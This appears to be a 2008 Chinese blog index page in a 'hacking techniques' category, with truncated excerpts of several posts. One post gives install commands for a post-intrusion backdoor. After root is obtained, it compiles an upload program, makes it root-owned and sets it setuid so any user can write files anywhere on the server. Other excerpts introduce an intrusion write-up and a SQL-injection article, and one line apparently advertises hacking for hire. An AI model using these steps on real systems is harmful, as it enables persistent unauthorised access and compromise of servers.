您正在查看 "hack技术" 分类下的文章
2008-09-19 20:29
偶今天重新开张了………………努力接单子……嘿嘿~!!~看来还是网络比较适合我~!~! |
2008-02-28 11:07
1 UPLOAD
侵入成功后,拿到root权限了,这个东东可以把他的服务器的访问权限改了,让任何人都可以上传文件 !
root 状 态 下, 运 行 Install 后,
upload 将 允 许 普 通 用 户 上 载 文 件 至 任 何 目 录 下。
# chmod 755 install
#./install
$Content$nbsp;more install
#! /bin/csh -f
cc upload.c
cp a.out upload
chown root upload
chmod 755 upload
chmod u+s upload
$Content$nbsp;more upload.c
#include <stdio.h>
main() |
2008-02-28 11:04
首发IT168安全频道
转载请著明 [safe.it168.com]
作者:伤心的鱼
【IT168 专稿】前言:
笔者的一位朋友应聘到一家公司做网管,据说整个机房就他们俩人,工作很轻松。几乎是没什么事做,但是昨天突然给我打电话说是机房被入侵了,被人加了很多用户并且什么cain,arpspoof全都丢到服务器上了,想让笔者帮忙看看是怎么渗透进去的,于是乎在敲诈了一顿烤鸭之后笔者终于出手了。在经过朋友的同意之后特意将本文写出来!
一.渗透前的踩点:
这哥们也够狠,除了丢给我个IP其他什么 |
2008-02-28 10:59
难易程度:中级
适合对象:脚本技术爱好者
前置知识:SQL注入基本知识
wtf:这个文章小编今天来“客串”一下本版编辑,因为好友“臭要饭的!”给我此文的时候一再叮嘱内容的重要性和轰动性,所以这次委屈脚本小子了,呵呵。闲话少说,这绝对是一篇真实的安全测试文章,也是极具观赏性的。文中在某些问题上可能走了弯路,但是那是为了给大家讲解一个思路,所以关键的解决问题的思路才是最值得大家学习的。本文作者对脚本注入漏洞的深入了解,也有对入侵的新思维分析。如果你对脚本安全兴趣 |
2008-02-22 22:01
|
| 
